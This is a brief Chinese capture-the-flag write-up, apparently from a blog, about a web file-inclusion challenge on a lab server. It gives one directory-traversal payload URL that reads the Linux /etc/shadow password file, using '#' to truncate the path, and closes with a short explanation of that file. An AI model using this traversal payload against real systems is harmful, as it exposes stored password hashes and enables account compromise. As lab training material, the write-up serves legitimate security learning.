前言
题目分类:
CTF—Web—文件包含—09–etc/shadow
一、题目描述
题目: 文件包含
链接:http://172.16.15.216/stage/12/
二、解题步骤
1、 构造payload
读取linux的/etc/shadow文件,用#截断目录
http://172.16.15.216/stage/12/show.php?file=…/…/…/…/etc/shadow#
![在这里插入图片描述](https://img-blog.csdnimg.cn/7bbf1582756049b5b9ed5ec1de6a00a2.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzIyMTYwNTU3,size_16,color_FFFFFF,t_70)
三、总结
1、/etc/shadow,用于存储 Linux 系统中用户的密码信息,又称为“影子文件”
2、截断方式(总结)